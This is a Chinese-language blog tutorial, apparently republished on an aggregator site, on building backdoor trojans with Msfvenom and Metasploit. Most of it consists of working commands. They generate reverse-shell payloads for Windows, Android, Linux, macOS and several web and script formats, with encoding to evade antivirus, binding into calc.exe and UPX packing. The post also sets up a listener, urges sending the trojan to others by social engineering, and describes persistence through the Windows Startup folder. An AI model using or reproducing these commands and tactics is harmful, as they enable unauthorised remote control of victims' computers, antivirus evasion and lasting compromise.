Msfvenonm生成一个后门木马
在前一篇文章中我講了什么是Meterpreter,并且講解了Meterpreter的用法。傳送門——>Metasploit之Meterpreter
今天我要講的是我們用Msfvenom制作一個木馬,發送給其他主機,只要其他主機運行了該木馬,就會自動連接到我們的主機,并且建立一條TCP連接。我們可以通過這條TCP連接控制目標主機。
Msfvenom
–p (- -payload-options):添加載荷payload。載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的后門,所以只有選對payload,再填寫正確自己的IP,PORT,就可以生成對應語言,對應平臺的后門了!!!
–l:查看所有payload encoder nops。
–f :輸出文件格式。
–e:編碼免殺。
–a:選擇架構平臺 x86 | x64 | x86_64
–o:文件輸出
–s:生成payload的最大長度,就是文件大小。
–b:避免使用的字符 例如:不使用 ‘f’。
–i:編碼次數。
–c:添加自己的shellcode
–x | -k:捆綁
生成exe木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -f exe -o test.exe #lhost是我們的主機ip,lport是我們主機的用于監聽的端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o test.exe #編碼3次
然后會在該目錄下生成一個test.exe的木馬。
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 lhost=192.168.10.11 lport=8888 -x calc.exe -f exe -o test.exe #編碼20次、捆綁正常的32位calc.exe,生成32位的test.exe文件利用 upx 加殼
upx -9 test.exe -k -o test2.exe下面介紹一些生成其他格式的木馬!
安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.py接下來,我們運行msfconsole進入MSF控制臺,然后輸入以下命令
msf > use exploit/multi/handler #使用exploit/multi/handler監聽從肉雞發來的數據
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #設置payload,不同的木馬設置不同的payload
msf exploit(handler) > set lhost 192.168.10.15 #我們的主機ip
msf exploit(handler) > set lport 8888 #我們的主機端口
msf exploit(handler) > exploit
然后,將木馬發送給其他人,無論使用什么手段(可以使用社會工程學)讓其在其他主機上運行,我們這邊就會接收到反彈過來的session。
因為我們剛剛把進程掛在后臺,所以我們輸入:sessions -l 可以查看到我們得到的shell,使用 sessions -i 1可以進入指定的shell,我們這里只有一個,所以id為1。如圖,我們成功拿到了其他主機的shell
對于這個木馬,如果我們在獲取到某主機的shell后,想要在目標主機建立持續性的后門,我們可以將該木馬放到目標主機的開機啟動項中,那樣,只要該主機啟動后,我們就可以連接到該主機了。
C:Users$username$AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup但是,雖然目標主機運行了該木馬程序,但是由于種種原因,還是有可能獲取不到對方的session。如下圖,就沒有獲取到session。
關于后滲透階段如何使用Meterpreter,傳送門——>后滲透階段Meterpreter的使用
總結
以上是生活随笔為你收集整理的Msfvenonm生成一个后门木马的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [golang]语法基础之构造函数
- 下一篇: 谓语